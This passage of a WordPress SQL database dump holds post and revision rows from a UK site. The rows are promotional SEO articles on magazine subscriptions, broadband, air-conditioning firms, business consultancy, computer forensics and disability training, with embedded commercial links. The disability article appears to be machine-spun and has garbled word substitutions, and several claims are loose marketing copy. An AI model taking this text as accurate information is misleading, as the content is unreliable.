acclaimsubscriptions.com and get updated news about the various magazine subscription offers and hot deals on magazine subscription.','Attractive Magazine Subscription Offers','','publish','open','open','','attractive-magazine-subscription-offers','','','2018-02-06 10:43:27','2018-02-06 10:43:27','',0,'https://ashbooks.co.uk/?p=13',0,'post','',0),(14,1,'2018-02-06 09:46:27','2018-02-06 09:46:27','The cost of printing paper and production of magazines have risen considerably over the years. Consequently the cost of our favorite magazines has also shot through the skies. Hence it is getting more and more difficult to procure those prized possessions. Be it travel magazines or those sleek automobile magazines with your dream machines, the costs have risen sky high. Therefore it is sensible to choose a certain magazine and buy an annual subscription for the same, this will ensure a much lower price that the retail price of the particular issue.\r\n\r\nMost magazines offer half yearly, quarterly or annual subscription memberships at a much lower cost. From time to time some magazines also offer attractive discounts on memberships during certain times of the year. This is mostly a sales strategy aimed at achieving a target but it is a good deal for the readers.\r\n\r\nVarious wildlife magazines like Sanctuary and Wildlife Connect offer huge discounts to students since the magazine is mainly targeted at them. The subscription forms are generally available with the local vendors or at the back of the magazines which can be mailed along with the check. Some companies also send representatives at your door to collect the requisite amount and will deliver the magazines every month in your postal address.\r\n\r\nThe Times magazine is one of the most popular magazines and they also offer huge membership offers, apart form reduced cost, these periodicals also give discount coupons which can be availed at various pizza outlets and book stores. The duration of the subscription also affect the amount of discount that can be availed. If you book an annual subscription then you basically get 12 issues at the cost of mere 8 for a monthly magazine.\r\n\r\nOne of the most popular magazines in the music field is Rolling Stone. This particular magazine subscription offers many free issues with its annual subscription offers. Apart form huge discounts they also offer passes to rock shows for its members which are otherwise very hard to get. Hence it is sensible to go through the various offers before actually subscribing to one.\r\n\r\nThe magazine subscription trend has grown in popularity partly due to the growing fame of these magazines and partly due to the attractive offers. Also, with the advent of the internet, online issues are also available at a much lower cost; these are better and more environmentally friendly as there is no use of paper involved.\r\n\r\nThe magazine industry offers employment to many people and these offers are a way to keep the popularity of the magazines alive among the common mass, these magazines offer a glimpse into the world of the rich and famous and the ultimate and latest news in any field.\r\n\r\nThere are websites that offer subscription and attractive offers but many of them are fraudulent and are basically spams. So it is advisable to buy all your magazine subscriptions from one of the most trusted sites in this field, so visit acclaimsubscriptions.com and get updated news about the various magazine subscription offers and hot deals on magazine subscription.','Attractive Magazine Subscription Offers','','inherit','closed','closed','','13-revision-v1','','','2018-02-06 09:46:27','2018-02-06 09:46:27','',13,'https://ashbooks.co.uk/13-revision-v1',0,'revision','',0),(15,1,'2018-02-06 09:47:14','2018-02-06 09:47:14','A social media agency should ideally plan and strategize methods to improve the rankings of your business in search engines.\r\n\r\nThe internet has changed the world in every way possible. Without it, the desktop computer would be just another glorified typewriter that also performs the additional function of processing facts quickly. It would certainly not have been the window that opens out every avenue there is to us. It has also changed forever the functioning of the business world today. Modern Marketing Tools Gone are the days when a business could retain its monopoly or retain its market presence through the printing and distribution of handbills or a few commercials on television. These days the most effective marketing tool around us is social media. Facebook and Twitter are the most popular social media platforms available today. A smart business person is one that employs the services of an effective Social Media Agency in order to become successful.\r\n\r\nThe people at whom the product or service is aimed discuss, network, share and participate by getting together online. Functions of a Social Media Company A social media company can make a business popular in almost no time at all. It does so by following certain basic principles; the most important one of which is to use the comments and views of the people online to direct the required traffic to the business. The more traffic diverted to your product, the better is the search engine ranking of your business. This is known as search engine optimization in turn generates positive results for your company.\r\n\r\nThe social media agency will also plan strategies on how to build your particular business online as well as devise ways to keep up the interest quotient of the viewers towards your business and make your service stand out among all the other competitors. Finding the Best Social Media Company for Your Business Different businesses require different agencies according to their specific needs. With so many of them available online, you will have to find the most suitable Social Media Agency for you by keeping the following points in mind · Go through all the agencies you think would be ideal for your business and shortlist the ones that you feel are most suitable to your business needs.\r\n\r\n· Read the case studies of the agencies that you have chosen and find out the ones that most meet your search criteria.\r\n\r\n· Read the testimonials of the other businesses that have used the services of these shortlisted agencies.\r\n\r\n· Select a Social Media Company that has a good reputation and business ethics.\r\n\r\nBear in mind at all times that the social media company you zero in on for your business will have a profound effect on its outcome. Once you have selected the right. for your business, rest assured there will be no looking back for your business.\r\n\r\n<a href=\"http://www.digitallydifferent.co.uk/types-of-advertising-media.html\" target=\"_blank\" rel=\"noopener\">Visit this website</a> to understand the types of advertising media!','Find The Best Social Media Company According To Your Need','','publish','open','open','','find-the-best-social-media-company-according-to-your-need','','','2018-02-06 10:43:34','2018-02-06 10:43:34','',0,'https://ashbooks.co.uk/?p=15',0,'post','',0),(16,1,'2018-02-06 09:47:14','2018-02-06 09:47:14','A social media agency should ideally plan and strategize methods to improve the rankings of your business in search engines.\r\n\r\nThe internet has changed the world in every way possible. Without it, the desktop computer would be just another glorified typewriter that also performs the additional function of processing facts quickly. It would certainly not have been the window that opens out every avenue there is to us. It has also changed forever the functioning of the business world today. Modern Marketing Tools Gone are the days when a business could retain its monopoly or retain its market presence through the printing and distribution of handbills or a few commercials on television. These days the most effective marketing tool around us is social media. Facebook and Twitter are the most popular social media platforms available today. A smart business person is one that employs the services of an effective Social Media Agency in order to become successful. The people at whom the product or service is aimed discuss, network, share and participate by getting together online. Functions of a Social Media Company A social media company can make a business popular in almost no time at all. It does so by following certain basic principles; the most important one of which is to use the comments and views of the people online to direct the required traffic to the business. The more traffic diverted to your product, the better is the search engine ranking of your business. This is known as search engine optimization in turn generates positive results for your company. The social media agency will also plan strategies on how to build your particular business online as well as devise ways to keep up the interest quotient of the viewers towards your business and make your service stand out among all the other competitors. Finding the Best Social Media Company for Your Business Different businesses require different agencies according to their specific needs. With so many of them available online, you will have to find the most suitable Social Media Agency for you by keeping the following points in mind · Go through all the agencies you think would be ideal for your business and shortlist the ones that you feel are most suitable to your business needs.\r\n\r\n· Read the case studies of the agencies that you have chosen and find out the ones that most meet your search criteria.\r\n\r\n· Read the testimonials of the other businesses that have used the services of these shortlisted agencies.\r\n\r\n· Select a Social Media Company that has a good reputation and business ethics.\r\n\r\nBear in mind at all times that the social media company you zero in on for your business will have a profound effect on its outcome. Once you have selected the right. for your business, rest assured there will be no looking back for your business.','Find The Best Social Media Company According To Your Need.','','inherit','closed','closed','','15-revision-v1','','','2018-02-06 09:47:14','2018-02-06 09:47:14','',15,'https://ashbooks.co.uk/15-revision-v1',0,'revision','',0),(17,1,'2018-02-06 09:47:47','2018-02-06 09:47:47','There may be times when you wish to hammer your desktop or set on fire your laptop. Reason – frequent slowing down of your systems. However, at all times it is not your devices that are the cause of your mood swings but it is the broadband that snail-crawls when you are in middle of downloading movie files or new apps for your computer.\r\n\r\nThe only solution which you can do is switching your broadband service, rather than trying out various stunts to get your computer ill. Here, we look at some of the best broadband service providers in the UK, which offer excellent services to their customers.\r\n\r\nAcross Britain, there are leading players like Sky, BT and Virgin that provide lightning fast speeds of broadband. Sky, the telecommunication giant which provides TV, broadband as well as call service, is known to provide exceptional quality of all the three services. With broadband that gets you downloading speeds of up to 20Mbps at both limited and unlimited plans as well.\r\n\r\nThen there is BT, another well established broadband service provider that offers equally fair downloading as well as uploading speeds. Its amazing services lies in BT Infinity and BT Business Broadband.\r\n\r\nCurrently available only to a mere 4 million UK homes, Infinity by BT lets you enjoy broadband at its best. With uploading and downloading speeds of up to 10Mbps and 40Mbps respectively, you are sure to do a lot more than ever before. In a matter of 5 years, BT eyes that 2 out of 3 homes would surf the net, download files or chat online with friends at unbelievable speeds.\r\n\r\nBT infuses fibre-to-the-cabinet technology to bring forth to you the most desirable – Infinity.\r\n\r\nBusiness Broadband by BT is subjected to businesses that would like to enjoy great internet speeds at unbelievable prices. Basic Broadband, Unlimited Broadband and Advance Broadband are three business broadband deals by BT. Starting from £11 a month; the broadband plans are ranging up to £18 a month. While basic broadband offers a monthly usage of 10GB, Advance Broadband deal will serve you with 50GB usage per month.\r\n\r\nThere may always be many options to choose from, be it any service provider. Each of them would try and make their deals and offers as attractive as it could ever get. However, it is solely you that need to take control and decide with a calm mind about these various options while looking at all possibilities. Only then are you able to pick and choose the best broadband for yourself, without getting forced.','BT Infinity, when compared to other leading players in the UK - your business internet','','publish','open','open','','bt-infinity-when-compared-to-other-leading-players-in-the-uk-your-business-internet','','','2018-02-06 10:04:25','2018-02-06 10:04:25','',0,'https://ashbooks.co.uk/?p=17',0,'post','',0),(18,1,'2018-02-06 09:47:47','2018-02-06 09:47:47','There may be times when you wish to hammer your desktop or set on fire your laptop. Reason – frequent slowing down of your systems. However, at all times it is not your devices that are the cause of your mood swings but it is the broadband that snail-crawls when you are in middle of downloading movie files or new apps for your computer.\r\n\r\nThe only solution which you can do is switching your broadband service, rather than trying out various stunts to get your computer ill. Here, we look at some of the best broadband service providers in the UK, which offer excellent services to their customers.\r\n\r\nAcross Britain, there are leading players like Sky, BT and Virgin that provide lightning fast speeds of broadband. Sky, the telecommunication giant which provides TV, broadband as well as call service, is known to provide exceptional quality of all the three services. With broadband that gets you downloading speeds of up to 20Mbps at both limited and unlimited plans as well.\r\n\r\nThen there is BT, another well established broadband service provider that offers equally fair downloading as well as uploading speeds. Its amazing services lies in BT Infinity and BT Business Broadband.\r\n\r\nCurrently available only to a mere 4 million UK homes, Infinity by BT lets you enjoy broadband at its best. With uploading and downloading speeds of up to 10Mbps and 40Mbps respectively, you are sure to do a lot more than ever before. In a matter of 5 years, BT eyes that 2 out of 3 homes would surf the net, download files or chat online with friends at unbelievable speeds.\r\n\r\nBT infuses fibre-to-the-cabinet technology to bring forth to you the most desirable – Infinity.\r\n\r\nBusiness Broadband by BT is subjected to businesses that would like to enjoy great internet speeds at unbelievable prices. Basic Broadband, Unlimited Broadband and Advance Broadband are three business broadband deals by BT. Starting from £11 a month; the broadband plans are ranging up to £18 a month. While basic broadband offers a monthly usage of 10GB, Advance Broadband deal will serve you with 50GB usage per month.\r\n\r\nThere may always be many options to choose from, be it any service provider. Each of them would try and make their deals and offers as attractive as it could ever get. However, it is solely you that need to take control and decide with a calm mind about these various options while looking at all possibilities. Only then are you able to pick and choose the best broadband for yourself, without getting forced.','BT Infinity, when compared to other leading players in the UK - your business internet','','inherit','closed','closed','','17-revision-v1','','','2018-02-06 09:47:47','2018-02-06 09:47:47','',17,'https://ashbooks.co.uk/17-revision-v1',0,'revision','',0),(19,1,'2018-02-06 09:49:07','2018-02-06 09:49:07','We all know that air conditioners have become a necessity these days and you may think of buying an air conditioner either for your home or office. There are many air conditioning companies, however if you stay in London it would be better to buy such appliances from a local dealer because in case of some problem they will be able to provide you with proper service. There are a large number of Air Conditioning Companies London, but it is important to choose the right one.&lt;br&gt;&lt;br&gt;\r\n\r\nThere are a variety of air conditioning products like single air conditioning units or large, multiple units. There are a large number of Air Conditioning Companies London from where you can purchase air conditioners of your choice. However, it is important to choose the one which can provide you with all the services. It is necessary to do proper research about different Air Conditioning Companies London so that you can find out the best one by comparing them. By proper researching you will also have a good idea of the products as well as prices offered by various Air Conditioning Companies London.&lt;br&gt;&lt;br&gt;\r\n\r\nChoosing right company from different &lt;a href=\"http://www.accurateac.co.uk/air-conditioning-companies-in-london.aspx\"&gt;Air Conditioning Companies London&lt;/a&gt; is really a difficult task because there are so many to choose from. You can take help from your family, friends, relatives or neighbors as they will provide you with the appropriate information. Further, if you are not satisfied the best place to look for different Air Conditioning Companies London is the internet. You can find all relevant information on the internet. You will find more options on the internet, jot down various prices of the air conditioners offered by different Air Conditioning Companies London as well as the services and then choose the company from where you can get you air conditioner at affordable prices along with great maintenance services.\r\n\r\nSimilarly, it is important to choose the right Air Conditioning Installers. Although, installation services are provided by the companies from where you purchase you air conditioner. However, in case they do not provide installation services you will have to find Air Conditioning Installers to install your air conditioning unit. It is important to find Air Conditioning Installers who provide best services and while choosing Air Conditioning Installers you should keep in mind the following factors so as to ensure that you get proper services.\r\n\r\nThe first factor is experience. You must see that whether the &lt;a href=\"http://www.accurateac.co.uk/installation-department.aspx\"&gt;Air Conditioning Installers&lt;/a&gt; have experience in installing air conditioning units or not. An experienced installer can give you advise on how to keep maintain your air conditioning unit so as to keep it running without any hindrance. Secondly, it is important to compare the prices offered by various Air Conditioning Installers to find out which installer is providing the best price which you will be able to afford. Thirdly, you should look for professionalism to see whether they are reliable or not, treating you with respect and following up after installation to see whether you are satisfied or not.','Choosing the Right Air Conditioning Companies or Air Conditioning Installers for your business','','publish','open','open','','choosing-the-right-air-conditioning-companies-or-air-conditioning-installers-for-your-business','','','2018-02-06 10:04:24','2018-02-06 10:04:24','',0,'https://ashbooks.co.uk/?p=19',0,'post','',0),(20,1,'2018-02-06 09:49:07','2018-02-06 09:49:07','We all know that air conditioners have become a necessity these days and you may think of buying an air conditioner either for your home or office. There are many air conditioning companies, however if you stay in London it would be better to buy such appliances from a local dealer because in case of some problem they will be able to provide you with proper service. There are a large number of Air Conditioning Companies London, but it is important to choose the right one.&lt;br&gt;&lt;br&gt;\r\n\r\nThere are a variety of air conditioning products like single air conditioning units or large, multiple units. There are a large number of Air Conditioning Companies London from where you can purchase air conditioners of your choice. However, it is important to choose the one which can provide you with all the services. It is necessary to do proper research about different Air Conditioning Companies London so that you can find out the best one by comparing them. By proper researching you will also have a good idea of the products as well as prices offered by various Air Conditioning Companies London.&lt;br&gt;&lt;br&gt;\r\n\r\nChoosing right company from different &lt;a href=\"http://www.accurateac.co.uk/air-conditioning-companies-in-london.aspx\"&gt;Air Conditioning Companies London&lt;/a&gt; is really a difficult task because there are so many to choose from. You can take help from your family, friends, relatives or neighbors as they will provide you with the appropriate information. Further, if you are not satisfied the best place to look for different Air Conditioning Companies London is the internet. You can find all relevant information on the internet. You will find more options on the internet, jot down various prices of the air conditioners offered by different Air Conditioning Companies London as well as the services and then choose the company from where you can get you air conditioner at affordable prices along with great maintenance services.\r\n\r\nSimilarly, it is important to choose the right Air Conditioning Installers. Although, installation services are provided by the companies from where you purchase you air conditioner. However, in case they do not provide installation services you will have to find Air Conditioning Installers to install your air conditioning unit. It is important to find Air Conditioning Installers who provide best services and while choosing Air Conditioning Installers you should keep in mind the following factors so as to ensure that you get proper services.\r\n\r\nThe first factor is experience. You must see that whether the &lt;a href=\"http://www.accurateac.co.uk/installation-department.aspx\"&gt;Air Conditioning Installers&lt;/a&gt; have experience in installing air conditioning units or not. An experienced installer can give you advise on how to keep maintain your air conditioning unit so as to keep it running without any hindrance. Secondly, it is important to compare the prices offered by various Air Conditioning Installers to find out which installer is providing the best price which you will be able to afford. Thirdly, you should look for professionalism to see whether they are reliable or not, treating you with respect and following up after installation to see whether you are satisfied or not.','Choosing the Right Air Conditioning Companies or Air Conditioning Installers for your business','','inherit','closed','closed','','19-revision-v1','','','2018-02-06 09:49:07','2018-02-06 09:49:07','',19,'https://ashbooks.co.uk/19-revision-v1',0,'revision','',0),(21,1,'2018-02-06 09:49:41','2018-02-06 09:49:41','Over the past decade, computer related crimes have risen dramatically. The very technologies that have automated businesses around the world have also opened up gates for intrusion. Moreover, lack of robust computer or cyber security related laws has also jeopardized the situation. Also, it is a fact that there is very low number of prosecutions in these areas because of the obscure background of this area.\r\n\r\nCalifornia based leading investigative unit, Optimal Intelligence, provides premium computer surveillance services along with Computer Forensic Investigation, Email Tracking and Social Network Tracking to counter computer related crimes. Normally, there are two kinds of surveillance namely physical and computer those are used in computer crime investigations. Physical surveillance is done at the time of the abuse, through surveillance hidden cameras and is performed usually undercover. On the other hand, Computer surveillance is carried out in a number of ways. In an active way it is done through electronic monitoring like network sniffing and keyboard monitoring.\r\n\r\nThe highly competent investigators of OI, specializes in computer forensic investigation, to track down the suspects involved. Computer forensic relates to the study of computer systems with the help of advance forensic tools &amp; processes. OI possesses high level of expertise in magnetic media storage devises and related forensic data recovery. The process is carried out in a systematic manner starting from recovery of forensic data by bit by bit acquisition process so as to retain the reliability of the subject by prohibiting contamination.\r\n\r\nWith the increase in popularity of social network applications, hackers round the world have been indulged in crimes like identity &amp; data theft and hacking of computers etc. Optimal Intelligence team of cyber security expert’s use sophisticated techniques like email tracking and social network tracking to identify the source location of the crime and identity of the suspect. This is achieved with the assistance of companies providing such applications and tools and in accordance with Federal US Federal Cyber Laws.','Computer and Cyber Security Related Crimes and Associated Investigative Measures','','publish','open','open','','computer-and-cyber-security-related-crimes-and-associated-investigative-measures','','','2018-02-06 10:43:41','2018-02-06 10:43:41','',0,'https://ashbooks.co.uk/?p=21',0,'post','',0),(22,1,'2018-02-06 09:49:41','2018-02-06 09:49:41','Over the past decade, computer related crimes have risen dramatically. The very technologies that have automated businesses around the world have also opened up gates for intrusion. Moreover, lack of robust computer or cyber security related laws has also jeopardized the situation. Also, it is a fact that there is very low number of prosecutions in these areas because of the obscure background of this area.\r\n\r\nCalifornia based leading investigative unit, Optimal Intelligence, provides premium computer surveillance services along with Computer Forensic Investigation, Email Tracking and Social Network Tracking to counter computer related crimes. Normally, there are two kinds of surveillance namely physical and computer those are used in computer crime investigations. Physical surveillance is done at the time of the abuse, through surveillance hidden cameras and is performed usually undercover. On the other hand, Computer surveillance is carried out in a number of ways. In an active way it is done through electronic monitoring like network sniffing and keyboard monitoring.\r\n\r\nThe highly competent investigators of OI, specializes in computer forensic investigation, to track down the suspects involved. Computer forensic relates to the study of computer systems with the help of advance forensic tools &amp; processes. OI possesses high level of expertise in magnetic media storage devises and related forensic data recovery. The process is carried out in a systematic manner starting from recovery of forensic data by bit by bit acquisition process so as to retain the reliability of the subject by prohibiting contamination.\r\n\r\nWith the increase in popularity of social network applications, hackers round the world have been indulged in crimes like identity &amp; data theft and hacking of computers etc. Optimal Intelligence team of cyber security expert’s use sophisticated techniques like email tracking and social network tracking to identify the source location of the crime and identity of the suspect. This is achieved with the assistance of companies providing such applications and tools and in accordance with Federal US Federal Cyber Laws.','Computer and Cyber Security Related Crimes and Associated Investigative Measures','','inherit','closed','closed','','21-revision-v1','','','2018-02-06 09:49:41','2018-02-06 09:49:41','',21,'https://ashbooks.co.uk/21-revision-v1',0,'revision','',0),(23,1,'2018-02-06 09:49:55','2018-02-06 09:49:55','Starting up your own business is something that can be very exciting and, at the same time, challenging due to several issues that you must face. In most cases, people tend to forget these issues as they are too pre-occupied with saving up for their investment. Fortunately, consultancy firms such as The Entrepreneur\'s Source can help business owners like you when it comes to your priorities and solving these issues. <a href=\"http://www.a1businessforums.co.uk/forum\" target=\"_blank\" rel=\"noopener\">Take a look at this business forum</a>.\r\n\r\nOne of the things consultancy businesses can do to help you is to open your eyes for you to see the truth behind the economy. While most people believe that their business can surely survive any financial difficulty along the way, consultancy firms will make you understand why and how it is possible. A consultancy business will provide better strategies which can help your business survive different forms of financial stress.\r\n\r\nConsultancy companies like the entrepreneur\'s source can also assist business owners in evaluating the different components of the company. Redundancies and deficiencies when it comes to roles of each employee are often assessed, including the strengths and weaknesses of the company. In order to come up with an accurate evaluation of a company’s potential, consultancy businesses use methods for each component of the company. Some consultancy businesses, such as The Entrepreneur\'s Source use methods recommended by their team of financial, communication, and behavioral analysts to assess the employees and the company’s overall performance.\r\n\r\nWhen it comes to maintaining a business, change is the only thing that is constant. A strategy that can work today may no longer work the next day due to several factors such as the volatility of the market, preferences of the clients, and efficiency of the employees. Companies should always be ready to embrace changes by being open to suggestions and adapt to changes by employing new strategies every now and then.\r\n\r\nConsultancy business can offer trainings and seminars for the members of the company to keep them updated and ready to handle changes that can either help or distract them in achieving their goal. If you are an owner or an employee working for a business, you must be aware of what a goal is. It is something that gives you and the entire business a favorable direction.\r\n\r\nBy using consultancy businesses like The Entrepreneur\'s Source, rest assured that your company can reach its goals. There may be obstacles along the way, but as long as you are making the right decision, then achieving the goal is always worth a try. Any type business with a consultancy firm by its side will surely stand out from the rest.','Consultancy Firms: Helping Businesses Achieve the Goal','','publish','open','open','','consultancy-firms-helping-businesses-achieve-the-goal','','','2018-02-06 10:19:36','2018-02-06 10:19:36','',0,'https://ashbooks.co.uk/?p=23',0,'post','',0),(24,1,'2018-02-06 09:49:55','2018-02-06 09:49:55','Starting up your own business is something that can be very exciting and, at the same time, challenging due to several issues that you must face. In most cases, people tend to forget these issues as they are too pre-occupied with saving up for their investment. Fortunately, consultancy firms such as The Entrepreneur\'s Source can help business owners like you when it comes to your priorities and solving these issues.\r\n\r\nOne of the things consultancy businesses can do to help you is to open your eyes for you to see the truth behind the economy. While most people believe that their business can surely survive any financial difficulty along the way, consultancy firms will make you understand why and how it is possible. A consultancy business will provide better strategies which can help your business survive different forms of financial stress.\r\n\r\nConsultancy companies like the entrepreneur\'s source can also assist business owners in evaluating the different components of the company. Redundancies and deficiencies when it comes to roles of each employee are often assessed, including the strengths and weaknesses of the company. In order to come up with an accurate evaluation of a company’s potential, consultancy businesses use methods for each component of the company. Some consultancy businesses, such as The Entrepreneur\'s Source use methods recommended by their team of financial, communication, and behavioral analysts to assess the employees and the company’s overall performance.\r\n\r\nWhen it comes to maintaining a business, change is the only thing that is constant. A strategy that can work today may no longer work the next day due to several factors such as the volatility of the market, preferences of the clients, and efficiency of the employees. Companies should always be ready to embrace changes by being open to suggestions and adapt to changes by employing new strategies every now and then.\r\n\r\nConsultancy business can offer trainings and seminars for the members of the company to keep them updated and ready to handle changes that can either help or distract them in achieving their goal. If you are an owner or an employee working for a business, you must be aware of what a goal is. It is something that gives you and the entire business a favorable direction.\r\n\r\nBy using consultancy businesses like The Entrepreneur\'s Source, rest assured that your company can reach its goals. There may be obstacles along the way, but as long as you are making the right decision, then achieving the goal is always worth a try. Any type business with a consultancy firm by its side will surely stand out from the rest.','Consultancy Firms: Helping Businesses Achieve the Goal','','inherit','closed','closed','','23-revision-v1','','','2018-02-06 09:49:55','2018-02-06 09:49:55','',23,'https://ashbooks.co.uk/23-revision-v1',0,'revision','',0),(25,1,'2018-02-06 09:50:32','2018-02-06 09:50:32','The classical economic theory defines satisfaction as with the consumption of one unit of a commodity the change that occurs in utility. However that concept was later criticized on the grounds of rationality and there is now as such tool that can count or measure the utility of a commodity. But today management and economic studies consider customer satisfaction a major tool in determining the business goals and their achievements. Customer satisfaction and utility today are considered the practical platform where business entrepreneurs can base their marketing strategy and even the production capacity of their plants.\r\n\r\nThanks to the changing technology the voice of customer analysis is now heard louder. Actually today collection of data, co relation of statistics and results evaluation has been made much quicker and reliable. There are tools and technology that on their own collect data from multiple sources, interpret them and bring out the final outputs in precision. The main source of such statistics is the various surveys conducted in the consumer market.\r\n\r\nWhen a customer survey is conducted, each and every factor related to that is important. Either you are selling hot dogs of some luxury cars, every commodity has a customer and there are various satisfaction levels that vary with each consumer. Of course, a car manufacturer wont be producing hot dog or a hot dog vendor won’t be supplying car, but each and every commodity gives a satisfaction to the buyer.\r\n\r\nAs soon as the consumer is gaining higher satisfaction levels he will certainly be demanding more of it until law of diminishing marginal utility operates. And this is where all business lays their interests. For instance if a business marketing and production strategy is relying on customer satisfaction analysis he will be supplying his commodity with particular attributes till its marginal utility reaches a particular low point. Till that time the product will be produced and introduced in the market and will be marketed on the same basis as before. When the businesses see decline in demand followed by falling utility, that will signal a change in marketing and production strategy.\r\n\r\nThe similar product will be then produced and introduced with some different twist that the production management thinks will be sufficient enough to raise a whole new graph of rising demand. Here also customer satisfaction analysis plays a major role. This analysis shows the trends in consumer preferences that can later form of base of production and marketing.\r\n\r\nUntil here it was all about calculating and interpreting customer satisfaction statistics, but practically if look into that your statistics and data interpretation alone will not serve your purpose of rising business graphs. There are several other factors as well like your customer support, after sales services etc that contribute a lot in business marketing and promotion. A satisfied customer is the biggest reward and none can challenge the effectiveness of his word of mouth marketing. And that is possible only when he is receiving satisfactory product and services from you.','Customer satisfaction analysis – calculation and interpretation','','publish','open','open','','customer-satisfaction-analysis-calculation-and-interpretation','','','2018-02-06 10:04:23','2018-02-06 10:04:23','',0,'https://ashbooks.co.uk/?p=25',0,'post','',0),(26,1,'2018-02-06 09:50:32','2018-02-06 09:50:32','The classical economic theory defines satisfaction as with the consumption of one unit of a commodity the change that occurs in utility. However that concept was later criticized on the grounds of rationality and there is now as such tool that can count or measure the utility of a commodity. But today management and economic studies consider customer satisfaction a major tool in determining the business goals and their achievements. Customer satisfaction and utility today are considered the practical platform where business entrepreneurs can base their marketing strategy and even the production capacity of their plants.\r\n\r\nThanks to the changing technology the voice of customer analysis is now heard louder. Actually today collection of data, co relation of statistics and results evaluation has been made much quicker and reliable. There are tools and technology that on their own collect data from multiple sources, interpret them and bring out the final outputs in precision. The main source of such statistics is the various surveys conducted in the consumer market.\r\n\r\nWhen a customer survey is conducted, each and every factor related to that is important. Either you are selling hot dogs of some luxury cars, every commodity has a customer and there are various satisfaction levels that vary with each consumer. Of course, a car manufacturer wont be producing hot dog or a hot dog vendor won’t be supplying car, but each and every commodity gives a satisfaction to the buyer.\r\n\r\nAs soon as the consumer is gaining higher satisfaction levels he will certainly be demanding more of it until law of diminishing marginal utility operates. And this is where all business lays their interests. For instance if a business marketing and production strategy is relying on customer satisfaction analysis he will be supplying his commodity with particular attributes till its marginal utility reaches a particular low point. Till that time the product will be produced and introduced in the market and will be marketed on the same basis as before. When the businesses see decline in demand followed by falling utility, that will signal a change in marketing and production strategy.\r\n\r\nThe similar product will be then produced and introduced with some different twist that the production management thinks will be sufficient enough to raise a whole new graph of rising demand. Here also customer satisfaction analysis plays a major role. This analysis shows the trends in consumer preferences that can later form of base of production and marketing.\r\n\r\nUntil here it was all about calculating and interpreting customer satisfaction statistics, but practically if look into that your statistics and data interpretation alone will not serve your purpose of rising business graphs. There are several other factors as well like your customer support, after sales services etc that contribute a lot in business marketing and promotion. A satisfied customer is the biggest reward and none can challenge the effectiveness of his word of mouth marketing. And that is possible only when he is receiving satisfactory product and services from you.','Customer satisfaction analysis – calculation and interpretation','','inherit','closed','closed','','25-revision-v1','','','2018-02-06 09:50:32','2018-02-06 09:50:32','',25,'https://ashbooks.co.uk/25-revision-v1',0,'revision','',0),(27,1,'2018-02-06 09:50:52','2018-02-06 09:50:52','We sometimes are confused by the believed regarding how to approach the disabled individual.\r\n\r\nWe love to regard their self esteem and want to extend our assist in each and every way possible. Nevertheless, a number of situations may be cited when our serious initiatives proceed futile and that we end up hurting their own self confidence. This is especially reflected in place of work, shopping malls and other public places exactly where all of us wind up making them feel substandard in order to other people. We quite often wind up discerning disabled people though we by no means intend to.\r\n\r\nA handicapped person is like every additional normal individual as well as desires other people to treat him or her this way.\r\n\r\nA great number of organizations have offered and also have imparted disability awareness workout sessions to safeguard the interests associated with disabled individuals. Disability Equality training courses are designed to teach the most popular masses regarding emotions of handicapped individuals and the proper way to treat them. Providing disability equality training is completely required for individuals engaged in jobs where they\'re necessary to interact with clients directly. Seminars and workshop trainings are carried out and staffs are informed via interactive periods by using video clip, workbook and other online resources. It\'s important to follow a set of manners to have interaction along with handicapped people to ensure that we don\'t find themselves in discerning all of them. A good number of people avoid interacting with disabled individuals at all within stress they might end up in stating or even doing something that might hurt their self esteem. This frequently turns out to be counter productive. Like all other individual, disabled individuals prefer to mix within social groups and wouldn\'t appreciate being designated.\r\n\r\nThe culture suffers from typical misconceptions and misconceptions about impairment. It\'s a typical perception that the disabled individual offers vital self esteem which helps him conquer their incapability. The fact remains that a disabled person is very much an ordinary individual that performs the actual daily tasks with the help of attendant’s assistance. He requires impairment entry in public locations to carry out fundamental operations.\r\n\r\nA thorough understanding of Disability Discrimination act, 1995 is an imperative part of disability equality training course. It is absolutely essential for each organization to stick to disability Discrimination Act so as to avoid discrimination towards a disabled person.\r\n\r\nImparting disability equal rights instruction is absolutely crucial in workplace exactly where people through various avenues of life through different social backgrounds contact their own peers. Disability training ought to be included as a part of their induction so they stick to the organization norms if he or she communicates with the friend suffering from physical disability. This particular is true for every worker within the company including the management so that the handicapped employees don\'t in any way feel embarrassed by the carry out of the associates.','Disability and equality training- redefining life for disabled','','publish','open','open','','disability-and-equality-training-redefining-life-for-disabled','','','2018-02-06 10:21:38','2018-02-06 10:21:38','',0,'https://ashbooks.co.uk/?p=27',0,'post','',0),(28,1,'2018-02-06 09:50:52','2018-02-06 09:50:52','We sometimes are confused by the believed regarding how to approach the disabled individual.\r\n\r\nWe love to regard their self esteem and want to extend our assist in each and every way possible. Nevertheless, a number of situations may be cited when our serious initiatives proceed futile and that we end up hurting their own self confidence. This is especially reflected in place of work, shopping malls and other public places exactly where all of us wind up making them feel substandard in order to other people. We quite often wind up discerning disabled people though we by no means intend to.\r\n\r\nA handicapped person is like every additional normal individual as well as desires other people to treat him or her this way.\r\n\r\nA great number of organizations have offered and also have imparted disability awareness workout sessions to safeguard the interests associated with disabled individuals. Disability Equality training courses are designed to teach the most popular masses regarding emotions of handicapped individuals and the proper way to treat them. Providing disability equality training is completely required for individuals engaged in jobs where they\'re necessary to interact with clients directly. Seminars and workshop trainings are carried out and staffs are informed via interactive periods by using video clip, workbook and other online resources. It\'s important to follow a set of manners to have interaction along with handicapped people to ensure that we don\'t find themselves in discerning all of them. A good number of people avoid interacting with disabled individuals at all within stress they might end up in stating or even doing something that might hurt their self esteem. This frequently turns out to be counter productive. Like all other individual, disabled individuals prefer to mix within social groups and wouldn\'t appreciate being designated.\r\n\r\nThe culture suffers from typical misconceptions and misconceptions about impairment. It\'s a typical perception that the disabled individual offers vital self esteem which helps him conquer their incapability. The fact remains that a disabled person is very much an ordinary individual that performs the actual daily tasks with the help of attendant’s assistance. He requires impairment entry in public locations to carry out fundamental operations.\r\n\r\nA thorough understanding of Disability Discrimination act, 1995 is an imperative part of disability equality training course. It is absolutely essential for each organization to stick to disability Discrimination Act so as to avoid discrimination towards a disabled person.\r\n\r\nImparting disability equal rights instruction is absolutely crucial in workplace exactly where people through various avenues of life through different social backgrounds contact their own peers. Disability training ought to be included as a part of their induction so they stick to the organization norms if he or she communicates with the friend suffering from physical disability. This particular is true for every worker within the company including the management so that the handicapped employees don\'t in any way feel embarrassed by the carry out of the associates.','Disability and equality training- redefining life for disabled','','inherit','closed','closed','','27-revision-v1','','','2018-02-06 09:50:52','2018-02-06 